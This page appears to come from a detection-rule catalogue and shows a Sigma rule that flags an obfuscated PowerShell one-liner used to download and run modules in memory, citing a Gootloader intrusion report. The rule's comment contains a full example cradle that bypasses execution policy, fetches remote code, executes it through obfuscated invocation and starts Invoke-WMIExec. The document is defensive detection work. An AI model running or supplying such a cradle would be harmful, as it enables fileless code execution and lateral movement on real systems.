Obfuscated PowerShell OneLiner Execution
Detects the execution of a specific OneLiner to download and execute powershell modules in memory.
Sigma rule (View on GitHub)
1title: Obfuscated PowerShell OneLiner Execution
2id: 44e24481-6202-4c62-9127-5a0ae8e3fe3d
3status: test
4description: Detects the execution of a specific OneLiner to download and execute powershell modules in memory.
5references:
6 - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
7 - https://gist.github.com/mgeeky/3b11169ab77a7de354f4111aa2f0df38
8author: '@Kostastsale, TheDFIRReport'
9date: 2022-05-09
10modified: 2025-04-16
11tags:
12 - attack.defense-evasion
13 - attack.execution
14 - attack.t1059.001
15 - attack.t1562.001
16logsource:
17 product: windows
18 category: process_creation
19detection:
20 selection:
21 # Example: powershell -nop -noni -ep bypass -w h -c "$u=("http://127.0.0.1:1337/"|%%{(IRM $_)});&("".SubString.ToString()[67,72,64]-Join"")($u); Import-Module C:\Users\EXAMPLE\Invoke-WMIExec.ps1; Invoke-WMIExec"
22 Image|endswith: '\powershell.exe'
23 CommandLine|contains|all:
24 - 'http://127.0.0.1'
25 - '%{(IRM $_)}'
26 - 'Invoke'
27 condition: selection
28falsepositives:
29 - Unknown
30level: high
References
-
In early February 2022, we witnessed an intrusion employing Gootloader (aka GootKit) as the initial access vector. The intrusion lasted two days and comprised discovery, persistence, lateral moveme…
Read More -
Various Powershell Download Cradles purposed as one-liners - Download-Cradles-Oneliners.md
Read More
Related rules
- Custom Cobalt Strike Command Execution
- Potential BlackByte Ransomware Activity
- HackTool - Stracciatella Execution
- Remote Thread Creation Via PowerShell In Uncommon Target
- AMSI Bypass Pattern Assembly GetType